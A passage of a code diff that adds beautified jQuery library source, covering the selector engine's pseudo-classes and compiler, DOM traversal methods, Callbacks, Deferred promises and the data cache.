+ do if ((n = g ? t.lang : t.getAttribute("xml:lang") || t.getAttribute("lang"))) return (n = n.toLowerCase()) === e || 0 === n.indexOf(e + "-");
802
+ while ((t = t.parentNode) && 1 === t.nodeType);
803
+ return !1;
804
+ }
805
+ );
806
+ }),
807
+ target: function (t) {
808
+ var n = e.location && e.location.hash;
809
+ return n && n.slice(1) === t.id;
810
+ },
811
+ root: function (e) {
812
+ return e === h;
813
+ },
814
+ focus: function (e) {
815
+ return e === d.activeElement && (!d.hasFocus || d.hasFocus()) && !!(e.type || e.href || ~e.tabIndex);
816
+ },
817
+ enabled: em(!1),
818
+ disabled: em(!0),
819
+ checked: function (e) {
820
+ var t = e.nodeName.toLowerCase();
821
+ return ("input" === t && !!e.checked) || ("option" === t && !!e.selected);
822
+ },
823
+ selected: function (e) {
824
+ return e.parentNode && e.parentNode.selectedIndex, !0 === e.selected;
825
+ },
826
+ empty: function (e) {
827
+ for (e = e.firstChild; e; e = e.nextSibling) if (e.nodeType < 6) return !1;
828
+ return !0;
829
+ },
830
+ parent: function (e) {
831
+ return !r.pseudos.empty(e);
832
+ },
833
+ header: function (e) {
834
+ return J.test(e.nodeName);
835
+ },
836
+ input: function (e) {
837
+ return K.test(e.nodeName);
838
+ },
839
+ button: function (e) {
840
+ var t = e.nodeName.toLowerCase();
841
+ return ("input" === t && "button" === e.type) || "button" === t;
842
+ },
843
+ text: function (e) {
844
+ var t;
845
+ return "input" === e.nodeName.toLowerCase() && "text" === e.type && (null == (t = e.getAttribute("type")) || "text" === t.toLowerCase());
846
+ },
847
+ first: ey(function () {
848
+ return [0];
849
+ }),
850
+ last: ey(function (e, t) {
851
+ return [t - 1];
852
+ }),
853
+ eq: ey(function (e, t, n) {
854
+ return [n < 0 ? n + t : n];
855
+ }),
856
+ even: ey(function (e, t) {
857
+ for (var n = 0; n < t; n += 2) e.push(n);
858
+ return e;
859
+ }),
860
+ odd: ey(function (e, t) {
861
+ for (var n = 1; n < t; n += 2) e.push(n);
862
+ return e;
863
+ }),
864
+ lt: ey(function (e, t, n) {
865
+ for (var r = n < 0 ? n + t : n > t ? t : n; --r >= 0; ) e.push(r);
866
+ return e;
867
+ }),
868
+ gt: ey(function (e, t, n) {
869
+ for (var r = n < 0 ? n + t : n; ++r < t; ) e.push(r);
870
+ return e;
871
+ }),
872
+ },
873
+ }).pseudos.nth = r.pseudos.eq),
874
+ { radio: !0, checkbox: !0, file: !0, password: !0, image: !0 }))
875
+ r.pseudos[t] = eg(t);
876
+ for (t in { submit: !0, reset: !0 }) r.pseudos[t] = ev(t);
877
+ function ex() {}
878
+ function eb(e) {
879
+ for (var t = 0, n = e.length, r = ""; t < n; t++) r += e[t].value;
880
+ return r;
881
+ }
882
+ function e_(e, t, n) {
883
+ var r = t.dir,
884
+ i = t.next,
885
+ o = i || r,
886
+ a = n && "parentNode" === o,
887
+ s = w++;
888
+ return t.first
889
+ ? function (t, n, i) {
890
+ for (; (t = t[r]); ) if (1 === t.nodeType || a) return e(t, n, i);
891
+ return !1;
892
+ }
893
+ : function (t, n, u) {
894
+ var l,
895
+ c,
896
+ f,
897
+ p = [T, s];
898
+ if (u) {
899
+ for (; (t = t[r]); ) if ((1 === t.nodeType || a) && e(t, n, u)) return !0;
900
+ } else
901
+ for (; (t = t[r]); )
902
+ if (1 === t.nodeType || a) {
903
+ if (((c = (f = t[b] || (t[b] = {}))[t.uniqueID] || (f[t.uniqueID] = {})), i && i === t.nodeName.toLowerCase())) t = t[r] || t;
904
+ else {
905
+ if ((l = c[o]) && l[0] === T && l[1] === s) return (p[2] = l[2]);
906
+ if (((c[o] = p), (p[2] = e(t, n, u)))) return !0;
907
+ }
908
+ }
909
+ return !1;
910
+ };
911
+ }
912
+ function eT(e) {
913
+ return e.length > 1
914
+ ? function (t, n, r) {
915
+ for (var i = e.length; i--; ) if (!e[i](t, n, r)) return !1;
916
+ return !0;
917
+ }
918
+ : e[0];
919
+ }
920
+ function ew(e, t, n, r, i) {
921
+ for (var o, a = [], s = 0, u = e.length, l = null != t; s < u; s++) (o = e[s]) && ((n && !n(o, r, i)) || (a.push(o), l && t.push(s)));
922
+ return a;
923
+ }
924
+ function eC(e, t, n, r, i, o) {
925
+ return (
926
+ r && !r[b] && (r = eC(r)),
927
+ i && !i[b] && (i = eC(i, o)),
928
+ ef(function (o, a, s, u) {
929
+ var l,
930
+ c,
931
+ f,
932
+ p = [],
933
+ d = [],
934
+ h = a.length,
935
+ g =
936
+ o ||
937
+ (function (e, t, n) {
938
+ for (var r = 0, i = t.length; r < i; r++) el(e, t[r], n);
939
+ return n;
940
+ })(t || "*", s.nodeType ? [s] : s, []),
941
+ v = e && (o || !t) ? ew(g, p, e, s, u) : g,
942
+ m = n ? (i || (o ? e : h || r) ? [] : a) : v;
943
+ if ((n && n(v, m, s, u), r)) for (l = ew(m, d), r(l, [], s, u), c = l.length; c--; ) (f = l[c]) && (m[d[c]] = !(v[d[c]] = f));
944
+ if (o) {
945
+ if (i || e) {
946
+ if (i) {
947
+ for (l = [], c = m.length; c--; ) (f = m[c]) && l.push((v[c] = f));
948
+ i(null, (m = []), l, u);
949
+ }
950
+ for (c = m.length; c--; ) (f = m[c]) && (l = i ? P(o, f) : p[c]) > -1 && (o[l] = !(a[l] = f));
951
+ }
952
+ } else (m = ew(m === a ? m.splice(h, m.length) : m)), i ? i(null, a, m, u) : L.apply(a, m);
953
+ })
954
+ );
955
+ }
956
+ function ek(e) {
957
+ for (
958
+ var t,
959
+ n,
960
+ i,
961
+ o = e.length,
962
+ a = r.relative[e[0].type],
963
+ s = a || r.relative[" "],
964
+ u = a ? 1 : 0,
965
+ c = e_(
966
+ function (e) {
967
+ return e === t;
968
+ },
969
+ s,
970
+ !0
971
+ ),
972
+ f = e_(
973
+ function (e) {
974
+ return P(t, e) > -1;
975
+ },
976
+ s,
977
+ !0
978
+ ),
979
+ p = [
980
+ function (e, n, r) {
981
+ var i = (!a && (r || n !== l)) || ((t = n).nodeType ? c(e, n, r) : f(e, n, r));
982
+ return (t = null), i;
983
+ },
984
+ ];
985
+ u < o;
986
+ u++
987
+ )
988
+ if ((n = r.relative[e[u].type])) p = [e_(eT(p), n)];
989
+ else {
990
+ if ((n = r.filter[e[u].type].apply(null, e[u].matches))[b]) {
991
+ for (i = ++u; i < o && !r.relative[e[i].type]; i++);
992
+ return eC(u > 1 && eT(p), u > 1 && eb(e.slice(0, u - 1).concat({ value: " " === e[u - 2].type ? "*" : "" })).replace(F, "$1"), n, u < i && ek(e.slice(u, i)), i < o && ek((e = e.slice(i))), i < o && eb(e));
993
+ }
994
+ p.push(n);
995
+ }
996
+ return eT(p);
997
+ }
998
+ return (
999
+ (ex.prototype = r.filters = r.pseudos),
1000
+ (r.setFilters = new ex()),
1001
+ (a = el.tokenize = function (e, t) {
1002
+ var n,
1003
+ i,
1004
+ o,
1005
+ a,
1006
+ s,
1007
+ u,
1008
+ l,
1009
+ c = k[e + " "];
1010
+ if (c) return t ? 0 : c.slice(0);
1011
+ for (s = e, u = [], l = r.preFilter; s; ) {
1012
+ for (a in ((!n || (i = z.exec(s))) && (i && (s = s.slice(i[0].length) || s), u.push((o = []))),
1013
+ (n = !1),
1014
+ (i = X.exec(s)) && ((n = i.shift()), o.push({ value: n, type: i[0].replace(F, " ") }), (s = s.slice(n.length))),
1015
+ r.filter))
1016
+ (i = Y[a].exec(s)) && (!l[a] || (i = l[a](i))) && ((n = i.shift()), o.push({ value: n, type: a, matches: i }), (s = s.slice(n.length)));
1017
+ if (!n) break;
1018
+ }
1019
+ return t ? s.length : s ? el.error(e) : k(e, u).slice(0);
1020
+ }),
1021
+ (s = el.compile = function (e, t) {
1022
+ var n,
1023
+ i,
1024
+ o,
1025
+ s,
1026
+ u,
1027
+ c,
1028
+ f = [],
1029
+ h = [],
1030
+ v = S[e + " "];
1031
+ if (!v) {
1032
+ for (t || (t = a(e)), c = t.length; c--; ) (v = ek(t[c]))[b] ? f.push(v) : h.push(v);
1033
+ (v = S(
1034
+ e,
1035
+ ((n = h),
1036
+ (o = (i = f).length > 0),
1037
+ (s = n.length > 0),
1038
+ (u = function (e, t, a, u, c) {
1039
+ var f,
1040
+ h,
1041
+ v,
1042
+ m = 0,
1043
+ y = "0",
1044
+ x = e && [],
1045
+ b = [],
1046
+ _ = l,
1047
+ w = e || (s && r.find.TAG("*", c)),
1048
+ C = (T += null == _ ? 1 : Math.random() || 0.1),
1049
+ k = w.length;
1050
+ for (c && (l = t == d || t || c); y !== k && null != (f = w[y]); y++) {
1051
+ if (s && f) {
1052
+ for (h = 0, t || f.ownerDocument == d || (p(f), (a = !g)); (v = n[h++]); )
1053
+ if (v(f, t || d, a)) {
1054
+ u.push(f);
1055
+ break;
1056
+ }
1057
+ c && (T = C);
1058
+ }
1059
+ o && ((f = !v && f) && m--, e && x.push(f));
1060
+ }
1061
+ if (((m += y), o && y !== m)) {
1062
+ for (h = 0; (v = i[h++]); ) v(x, b, t, a);
1063
+ if (e) {
1064
+ if (m > 0) for (; y--; ) x[y] || b[y] || (b[y] = j.call(u));
1065
+ b = ew(b);
1066
+ }
1067
+ L.apply(u, b), c && !e && b.length > 0 && m + i.length > 1 && el.uniqueSort(u);
1068
+ }
1069
+ return c && ((T = C), (l = _)), x;
1070
+ }),
1071
+ o ? ef(u) : u)
1072
+ )).selector = e;
1073
+ }
1074
+ return v;
1075
+ }),
1076
+ (u = el.select = function (e, t, n, i) {
1077
+ var o,
1078
+ u,
1079
+ l,
1080
+ c,
1081
+ f,
1082
+ p = "function" == typeof e && e,
1083
+ d = !i && a((e = p.selector || e));
1084
+ if (((n = n || []), 1 === d.length)) {
1085
+ if ((u = d[0] = d[0].slice(0)).length > 2 && "ID" === (l = u[0]).type && 9 === t.nodeType && g && r.relative[u[1].type]) {
1086
+ if (!(t = (r.find.ID(l.matches[0].replace(en, er), t) || [])[0])) return n;
1087
+ p && (t = t.parentNode), (e = e.slice(u.shift().value.length));
1088
+ }
1089
+ for (o = Y.needsContext.test(e) ? 0 : u.length; o-- && ((l = u[o]), !r.relative[(c = l.type)]); )
1090
+ if ((f = r.find[c]) && (i = f(l.matches[0].replace(en, er), (et.test(u[0].type) && e$(t.parentNode)) || t))) {
1091
+ if ((u.splice(o, 1), !(e = i.length && eb(u)))) return L.apply(n, i), n;
1092
+ break;
1093
+ }
1094
+ }
1095
+ return (p || s(e, d))(i, t, !g, n, !t || (et.test(e) && e$(t.parentNode)) || t), n;
1096
+ }),
1097
+ (n.sortStable = b.split("").sort(N).join("") === b),
1098
+ (n.detectDuplicates = !!f),
1099
+ p(),
1100
+ (n.sortDetached = ep(function (e) {
1101
+ return 1 & e.compareDocumentPosition(d.createElement("fieldset"));
1102
+ })),
1103
+ ep(function (e) {
1104
+ return (e.innerHTML = "<a href='#'></a>"), "#" === e.firstChild.getAttribute("href");
1105
+ }) ||
1106
+ ed("type|href|height|width", function (e, t, n) {
1107
+ if (!n) return e.getAttribute(t, "type" === t.toLowerCase() ? 1 : 2);
1108
+ }),
1109
+ (n.attributes &&
1110
+ ep(function (e) {
1111
+ return (e.innerHTML = "<input/>"), e.firstChild.setAttribute("value", ""), "" === e.firstChild.getAttribute("value");
1112
+ })) ||
1113
+ ed("value", function (e, t, n) {
1114
+ if (!n && "input" === e.nodeName.toLowerCase()) return e.defaultValue;
1115
+ }),
1116
+ ep(function (e) {
1117
+ return null == e.getAttribute("disabled");
1118
+ }) ||
1119
+ ed(O, function (e, t, n) {
1120
+ var r;
1121
+ if (!n) return !0 === e[t] ? t.toLowerCase() : (r = e.getAttributeNode(t)) && r.specified ? r.value : null;
1122
+ }),
1123
+ el
1124
+ );
1125
+ })(e);
1126
+ (b.find = T), (b.expr = T.selectors), (b.expr[":"] = b.expr.pseudos), (b.uniqueSort = b.unique = T.uniqueSort), (b.text = T.getText), (b.isXMLDoc = T.isXML), (b.contains = T.contains), (b.escapeSelector = T.escape);
1127
+ var w = function (e, t, n) {
1128
+ for (var r = [], i = void 0 !== n; (e = e[t]) && 9 !== e.nodeType; )
1129
+ if (1 === e.nodeType) {
1130
+ if (i && b(e).is(n)) break;
1131
+ r.push(e);
1132
+ }
1133
+ return r;
1134
+ },
1135
+ C = function (e, t) {
1136
+ for (var n = []; e; e = e.nextSibling) 1 === e.nodeType && e !== t && n.push(e);
1137
+ return n;
1138
+ },
1139
+ k = b.expr.match.needsContext;
1140
+ function S(e, t) {
1141
+ return e.nodeName && e.nodeName.toLowerCase() === t.toLowerCase();
1142
+ }
1143
+ var E = /^<([a-z][^\/\0>:\x20\t\r\n\f]*)[\x20\t\r\n\f]*\/?>(?:<\/\1>|)$/i;
1144
+ function N(e, t, n) {
1145
+ return h(t)
1146
+ ? b.grep(e, function (e, r) {
1147
+ return !!t.call(e, r, e) !== n;
1148
+ })
1149
+ : t.nodeType
1150
+ ? b.grep(e, function (e) {
1151
+ return (e === t) !== n;
1152
+ })
1153
+ : "string" != typeof t
1154
+ ? b.grep(e, function (e) {
1155
+ return s.call(t, e) > -1 !== n;
1156
+ })
1157
+ : b.filter(t, e, n);
1158
+ }
1159
+ (b.filter = function (e, t, n) {
1160
+ var r = t[0];
1161
+ return (
1162
+ n && (e = ":not(" + e + ")"),
1163
+ 1 === t.length && 1 === r.nodeType
1164
+ ? b.find.matchesSelector(r, e)
1165
+ ? [r]
1166
+ : []
1167
+ : b.find.matches(
1168
+ e,
1169
+ b.grep(t, function (e) {
1170
+ return 1 === e.nodeType;
1171
+ })
1172
+ )
1173
+ );
1174
+ }),
1175
+ b.fn.extend({
1176
+ find: function (e) {
1177
+ var t,
1178
+ n,
1179
+ r = this.length,
1180
+ i = this;
1181
+ if ("string" != typeof e)
1182
+ return this.pushStack(
1183
+ b(e).filter(function () {
1184
+ for (t = 0; t < r; t++) if (b.contains(i[t], this)) return !0;
1185
+ })
1186
+ );
1187
+ for (n = this.pushStack([]), t = 0; t < r; t++) b.find(e, i[t], n);
1188
+ return r > 1 ? b.uniqueSort(n) : n;
1189
+ },
1190
+ filter: function (e) {
1191
+ return this.pushStack(N(this, e || [], !1));
1192
+ },
1193
+ not: function (e) {
1194
+ return this.pushStack(N(this, e || [], !0));
1195
+ },
1196
+ is: function (e) {
1197
+ return !!N(this, "string" == typeof e && k.test(e) ? b(e) : e || [], !1).length;
1198
+ },
1199
+ });
1200
+ var A,
1201
+ D = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/;
1202
+ ((b.fn.init = function (e, t, n) {
1203
+ var r, i;
1204
+ if (!e) return this;
1205
+ if (((n = n || A), "string" == typeof e)) {
1206
+ if (!(r = "<" === e[0] && ">" === e[e.length - 1] && e.length >= 3 ? [null, e, null] : D.exec(e)) || (!r[1] && t)) return !t || t.jquery ? (t || n).find(e) : this.constructor(t).find(e);
1207
+ if (r[1]) {
1208
+ if (((t = t instanceof b ? t[0] : t), b.merge(this, b.parseHTML(r[1], t && t.nodeType ? t.ownerDocument || t : v, !0)), E.test(r[1]) && b.isPlainObject(t))) for (r in t) h(this[r]) ? this[r](t[r]) : this.attr(r, t[r]);
1209
+ return this;
1210
+ }
1211
+ return (i = v.getElementById(r[2])) && ((this[0] = i), (this.length = 1)), this;
1212
+ }
1213
+ return e.nodeType ? ((this[0] = e), (this.length = 1), this) : h(e) ? (void 0 !== n.ready ? n.ready(e) : e(b)) : b.makeArray(e, this);
1214
+ }).prototype = b.fn),
1215
+ (A = b(v));
1216
+ var j = /^(?:parents|prev(?:Until|All))/,
1217
+ q = { children: !0, contents: !0, next: !0, prev: !0 };
1218
+ function L(e, t) {
1219
+ for (; (e = e[t]) && 1 !== e.nodeType; );
1220
+ return e;
1221
+ }
1222
+ b.fn.extend({
1223
+ has: function (e) {
1224
+ var t = b(e, this),
1225
+ n = t.length;
1226
+ return this.filter(function () {
1227
+ for (var e = 0; e < n; e++) if (b.contains(this, t[e])) return !0;
1228
+ });
1229
+ },
1230
+ closest: function (e, t) {
1231
+ var n,
1232
+ r = 0,
1233
+ i = this.length,
1234
+ o = [],
1235
+ a = "string" != typeof e && b(e);
1236
+ if (!k.test(e)) {
1237
+ for (; r < i; r++)
1238
+ for (n = this[r]; n && n !== t; n = n.parentNode)
1239
+ if (n.nodeType < 11 && (a ? a.index(n) > -1 : 1 === n.nodeType && b.find.matchesSelector(n, e))) {
1240
+ o.push(n);
1241
+ break;
1242
+ }
1243
+ }
1244
+ return this.pushStack(o.length > 1 ? b.uniqueSort(o) : o);
1245
+ },
1246
+ index: function (e) {
1247
+ return e ? ("string" == typeof e ? s.call(b(e), this[0]) : s.call(this, e.jquery ? e[0] : e)) : this[0] && this[0].parentNode ? this.first().prevAll().length : -1;
1248
+ },
1249
+ add: function (e, t) {
1250
+ return this.pushStack(b.uniqueSort(b.merge(this.get(), b(e, t))));
1251
+ },
1252
+ addBack: function (e) {
1253
+ return this.add(null == e ? this.prevObject : this.prevObject.filter(e));
1254
+ },
1255
+ }),
1256
+ b.each(
1257
+ {
1258
+ parent: function (e) {
1259
+ var t = e.parentNode;
1260
+ return t && 11 !== t.nodeType ? t : null;
1261
+ },
1262
+ parents: function (e) {
1263
+ return w(e, "parentNode");
1264
+ },
1265
+ parentsUntil: function (e, t, n) {
1266
+ return w(e, "parentNode", n);
1267
+ },
1268
+ next: function (e) {
1269
+ return L(e, "nextSibling");
1270
+ },
1271
+ prev: function (e) {
1272
+ return L(e, "previousSibling");
1273
+ },
1274
+ nextAll: function (e) {
1275
+ return w(e, "nextSibling");
1276
+ },
1277
+ prevAll: function (e) {
1278
+ return w(e, "previousSibling");
1279
+ },
1280
+ nextUntil: function (e, t, n) {
1281
+ return w(e, "nextSibling", n);
1282
+ },
1283
+ prevUntil: function (e, t, n) {
1284
+ return w(e, "previousSibling", n);
1285
+ },
1286
+ siblings: function (e) {
1287
+ return C((e.parentNode || {}).firstChild, e);
1288
+ },
1289
+ children: function (e) {
1290
+ return C(e.firstChild);
1291
+ },
1292
+ contents: function (e) {
1293
+ return null != e.contentDocument && r(e.contentDocument) ? e.contentDocument : (S(e, "template") && (e = e.content || e), b.merge([], e.childNodes));
1294
+ },
1295
+ },
1296
+ function (e, t) {
1297
+ b.fn[e] = function (n, r) {
1298
+ var i = b.map(this, t, n);
1299
+ return "Until" !== e.slice(-5) && (r = n), r && "string" == typeof r && (i = b.filter(r, i)), this.length > 1 && (q[e] || b.uniqueSort(i), j.test(e) && i.reverse()), this.pushStack(i);
1300
+ };
1301
+ }
1302
+ );
1303
+ var H = /[^\x20\t\r\n\f]+/g;
1304
+ function P(e) {
1305
+ return e;
1306
+ }
1307
+ function O(e) {
1308
+ throw e;
1309
+ }
1310
+ function I(e, t, n, r) {
1311
+ var i;
1312
+ try {
1313
+ e && h((i = e.promise)) ? i.call(e).done(t).fail(n) : e && h((i = e.then)) ? i.call(e, t, n) : t.apply(void 0, [e].slice(r));
1314
+ } catch (o) {
1315
+ n.apply(void 0, [o]);
1316
+ }
1317
+ }
1318
+ (b.Callbacks = function (e) {
1319
+ e =
1320
+ "string" == typeof e
1321
+ ? ((t = e),
1322
+ (n = {}),
1323
+ b.each(t.match(H) || [], function (e, t) {
1324
+ n[t] = !0;
1325
+ }),
1326
+ n)
1327
+ : b.extend({}, e);
1328
+ var t,
1329
+ n,
1330
+ r,
1331
+ i,
1332
+ o,
1333
+ a,
1334
+ s = [],
1335
+ u = [],
1336
+ l = -1,
1337
+ c = function () {
1338
+ for (a = a || e.once, o = r = !0; u.length; l = -1) for (i = u.shift(); ++l < s.length; ) !1 === s[l].apply(i[0], i[1]) && e.stopOnFalse && ((l = s.length), (i = !1));
1339
+ e.memory || (i = !1), (r = !1), a && (s = i ? [] : "");
1340
+ },
1341
+ f = {
1342
+ add: function () {
1343
+ return (
1344
+ s &&
1345
+ (i && !r && ((l = s.length - 1), u.push(i)),
1346
+ (function t(n) {
1347
+ b.each(n, function (n, r) {
1348
+ h(r) ? (e.unique && f.has(r)) || s.push(r) : r && r.length && "string" !== x(r) && t(r);
1349
+ });
1350
+ })(arguments),
1351
+ i && !r && c()),
1352
+ this
1353
+ );
1354
+ },
1355
+ remove: function () {
1356
+ return (
1357
+ b.each(arguments, function (e, t) {
1358
+ for (var n; (n = b.inArray(t, s, n)) > -1; ) s.splice(n, 1), n <= l && l--;
1359
+ }),
1360
+ this
1361
+ );
1362
+ },
1363
+ has: function (e) {
1364
+ return e ? b.inArray(e, s) > -1 : s.length > 0;
1365
+ },
1366
+ empty: function () {
1367
+ return s && (s = []), this;
1368
+ },
1369
+ disable: function () {
1370
+ return (a = u = []), (s = i = ""), this;
1371
+ },
1372
+ disabled: function () {
1373
+ return !s;
1374
+ },
1375
+ lock: function () {
1376
+ return (a = u = []), i || r || (s = i = ""), this;
1377
+ },
1378
+ locked: function () {
1379
+ return !!a;
1380
+ },
1381
+ fireWith: function (e, t) {
1382
+ return a || ((t = [e, (t = t || []).slice ? t.slice() : t]), u.push(t), r || c()), this;
1383
+ },
1384
+ fire: function () {
1385
+ return f.fireWith(this, arguments), this;
1386
+ },
1387
+ fired: function () {
1388
+ return !!o;
1389
+ },
1390
+ };
1391
+ return f;
1392
+ }),
1393
+ b.extend({
1394
+ Deferred: function (t) {
1395
+ var n = [
1396
+ ["notify", "progress", b.Callbacks("memory"), b.Callbacks("memory"), 2],
1397
+ ["resolve", "done", b.Callbacks("once memory"), b.Callbacks("once memory"), 0, "resolved"],
1398
+ ["reject", "fail", b.Callbacks("once memory"), b.Callbacks("once memory"), 1, "rejected"],
1399
+ ],
1400
+ r = "pending",
1401
+ i = {
1402
+ state: function () {
1403
+ return r;
1404
+ },
1405
+ always: function () {
1406
+ return o.done(arguments).fail(arguments), this;
1407
+ },
1408
+ catch: function (e) {
1409
+ return i.then(null, e);
1410
+ },
1411
+ pipe: function () {
1412
+ var e = arguments;
1413
+ return b
1414
+ .Deferred(function (t) {
1415
+ b.each(n, function (n, r) {
1416
+ var i = h(e[r[4]]) && e[r[4]];
1417
+ o[r[1]](function () {
1418
+ var e = i && i.apply(this, arguments);
1419
+ e && h(e.promise) ? e.promise().progress(t.notify).done(t.resolve).fail(t.reject) : t[r[0] + "With"](this, i ? [e] : arguments);
1420
+ });
1421
+ }),
1422
+ (e = null);
1423
+ })
1424
+ .promise();
1425
+ },
1426
+ then: function (t, r, i) {
1427
+ var o = 0;
1428
+ function a(t, n, r, i) {
1429
+ return function () {
1430
+ var s = this,
1431
+ u = arguments,
1432
+ l = function () {
1433
+ var e, l;
1434
+ if (!(t < o)) {
1435
+ if ((e = r.apply(s, u)) === n.promise()) throw TypeError("Thenable self-resolution");
1436
+ h((l = e && ("object" == typeof e || "function" == typeof e) && e.then))
1437
+ ? i
1438
+ ? l.call(e, a(o, n, P, i), a(o, n, O, i))
1439
+ : (o++, l.call(e, a(o, n, P, i), a(o, n, O, i), a(o, n, P, n.notifyWith)))
1440
+ : (r !== P && ((s = void 0), (u = [e])), (i || n.resolveWith)(s, u));
1441
+ }
1442
+ },
1443
+ c = i
1444
+ ? l
1445
+ : function () {
1446
+ try {
1447
+ l();
1448
+ } catch (e) {
1449
+ b.Deferred.exceptionHook && b.Deferred.exceptionHook(e, c.stackTrace), t + 1 >= o && (r !== O && ((s = void 0), (u = [e])), n.rejectWith(s, u));
1450
+ }
1451
+ };
1452
+ t ? c() : (b.Deferred.getStackHook && (c.stackTrace = b.Deferred.getStackHook()), e.setTimeout(c));
1453
+ };
1454
+ }
1455
+ return b
1456
+ .Deferred(function (e) {
1457
+ n[0][3].add(a(0, e, h(i) ? i : P, e.notifyWith)), n[1][3].add(a(0, e, h(t) ? t : P)), n[2][3].add(a(0, e, h(r) ? r : O));
1458
+ })
1459
+ .promise();
1460
+ },
1461
+ promise: function (e) {
1462
+ return null != e ? b.extend(e, i) : i;
1463
+ },
1464
+ },
1465
+ o = {};
1466
+ return (
1467
+ b.each(n, function (e, t) {
1468
+ var a = t[2],
1469
+ s = t[5];
1470
+ (i[t[1]] = a.add),
1471
+ s &&
1472
+ a.add(
1473
+ function () {
1474
+ r = s;
1475
+ },
1476
+ n[3 - e][2].disable,
1477
+ n[3 - e][3].disable,
1478
+ n[0][2].lock,
1479
+ n[0][3].lock
1480
+ ),
1481
+ a.add(t[3].fire),
1482
+ (o[t[0]] = function () {
1483
+ return o[t[0] + "With"](this === o ? void 0 : this, arguments), this;
1484
+ }),
1485
+ (o[t[0] + "With"] = a.fireWith);
1486
+ }),
1487
+ i.promise(o),
1488
+ t && t.call(o, o),
1489
+ o
1490
+ );
1491
+ },
1492
+ when: function (e) {
1493
+ var t = arguments.length,
1494
+ n = t,
1495
+ r = Array(n),
1496
+ o = i.call(arguments),
1497
+ a = b.Deferred(),
1498
+ s = function (e) {
1499
+ return function (n) {
1500
+ (r[e] = this), (o[e] = arguments.length > 1 ? i.call(arguments) : n), --t || a.resolveWith(r, o);
1501
+ };
1502
+ };
1503
+ if (t <= 1 && (I(e, a.done(s(n)).resolve, a.reject, !t), "pending" === a.state() || h(o[n] && o[n].then))) return a.then();
1504
+ for (; n--; ) I(o[n], s(n), a.reject);
1505
+ return a.promise();
1506
+ },
1507
+ });
1508
+ var M = /^(Eval|Internal|Range|Reference|Syntax|Type|URI)Error$/;
1509
+ (b.Deferred.exceptionHook = function (t, n) {
1510
+ e.console && e.console.warn && t && M.test(t.name) && e.console.warn("jQuery.Deferred exception: " + t.message, t.stack, n);
1511
+ }),
1512
+ (b.readyException = function (t) {
1513
+ e.setTimeout(function () {
1514
+ throw t;
1515
+ });
1516
+ });
1517
+ var W = b.Deferred();
1518
+ function B() {
1519
+ v.removeEventListener("DOMContentLoaded", B), e.removeEventListener("load", B), b.ready();
1520
+ }
1521
+ (b.fn.ready = function (e) {
1522
+ return (
1523
+ W.then(e).catch(function (e) {
1524
+ b.readyException(e);
1525
+ }),
1526
+ this
1527
+ );
1528
+ }),
1529
+ b.extend({
1530
+ isReady: !1,
1531
+ readyWait: 1,
1532
+ ready: function (e) {
1533
+ (!0 === e ? --b.readyWait : b.isReady) || ((b.isReady = !0), (!0 !== e && --b.readyWait > 0) || W.resolveWith(v, [b]));
1534
+ },
1535
+ }),
1536
+ (b.ready.then = W.then),
1537
+ "complete" !== v.readyState && ("loading" === v.readyState || v.documentElement.doScroll) ? (v.addEventListener("DOMContentLoaded", B), e.addEventListener("load", B)) : e.setTimeout(b.ready);
1538
+ var R = function (e, t, n, r, i, o, a) {
1539
+ var s = 0,
1540
+ u = e.length,
1541
+ l = null == n;
1542
+ if ("object" === x(n)) for (s in ((i = !0), n)) R(e, t, s, n[s], !0, o, a);
1543
+ else if (
1544
+ void 0 !== r &&
1545
+ ((i = !0),
1546
+ h(r) || (a = !0),
1547
+ l &&
1548
+ (a
1549
+ ? (t.call(e, r), (t = null))
1550
+ : ((l = t),
1551
+ (t = function (e, t, n) {
1552
+ return l.call(b(e), n);
1553
+ }))),
1554
+ t)
1555
+ )
1556
+ for (; s < u; s++) t(e[s], n, a ? r : r.call(e[s], s, t(e[s], n)));
1557
+ return i ? e : l ? t.call(e) : u ? t(e[0], n) : o;
1558
+ },
1559
+ F = /^-ms-/,
1560
+ z = /-([a-z])/g;
1561
+ function X(e, t) {
1562
+ return t.toUpperCase();
1563
+ }
1564
+ function U(e) {
1565
+ return e.replace(F, "ms-").replace(z, X);
1566
+ }
1567
+ var V = function (e) {
1568
+ return 1 === e.nodeType || 9 === e.nodeType || !+e.nodeType;
1569
+ };
1570
+ function G() {
1571
+ this.expando = b.expando + G.uid++;
1572
+ }
1573
+ (G.uid = 1),
1574
+ (G.prototype = {
1575
+ cache: function (e) {
1576
+ var t = e[this.expando];
1577
+ return t || ((t = {}), V(e) && (e.nodeType ? (e[this.expando] = t) : Object.defineProperty(e, this.expando, { value: t, configurable: !0 }))), t;
1578
+ },
1579
+ set: function (e, t, n) {
1580
+ var r,
1581
+ i = this.cache(e);
1582
+ if ("string" == typeof t) i[U(t)] = n;
1583
+ else for (r in t) i[U(r)] = t[r];
1584
+ return i;
1585
+ },
1586
+ get: function (e, t) {
1587
+ return void 0 === t ? this.cache(e) : e[this.expando] && e[this.expando][U(t)];
1588
+ },
1589
+ access: function (e, t, n) {
1590
+ return void 0 === t || (t && "string" == typeof t && void 0 === n) ? this.get(e, t) : (this.set(e, t, n), void 0 !== n ? n : t);
1591
+ },
1592
+ remove: function (e, t) {
1593
+ var n,
1594
+ r = e[this.expando];
1595
+ if (void 0 !== r) {
1596
+ if (void 0 !== t) for (n = (t = Array.isArray(t) ? t.map(U) : ((t = U(t)) in r) ? [t] : t.match(H) || []).length; n--; ) delete r[t[n]];
1597
+ (void 0 === t || b.isEmptyObject(r)) && (e.nodeType ? (e[this.expando] = void 0) : delete e[this.expando]);
1598
+ }
1599
+ },
1600
+ hasData: function (e) {
1601
+ var t = e[this.expando];
1602
+ return void 0 !== t && !b.isEmptyObject(t);
1603
+ },
1604
+ });
1605
+ var Y = new G(),
1606
+ Q = new G(),
1607
+ K = /^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,
1608
+ J = /[A-Z]/g;
1609
+ function Z(e, t, n) {
1610
+ var r, i;
1611
+ if (void 0 === n && 1 === e.nodeType) {
1612
+ if (((r = "data-" + t.replace(J, "-$&").toLowerCase()), "string" == typeof (n = e.getAttribute(r)))) {
1613
+ try {
1614
+ n = ((i = n), "true" === i || ("false" !== i && ("null" === i ? null : i === +i + "" ? +i : K.test(i) ? JSON.parse(i) : i)));
1615
+ } catch (o) {}
1616
+ Q.set(e, t, n);
1617
+ } else n = void 0;
1618
+ }
1619
+ return n;
1620
+ }
1621
+ b.extend({
1622
+ hasData: function (e) {
1623
+ return Q.hasData(e) || Y.hasData(e);
1624
+ },
1625
+ data: function (e, t, n) {
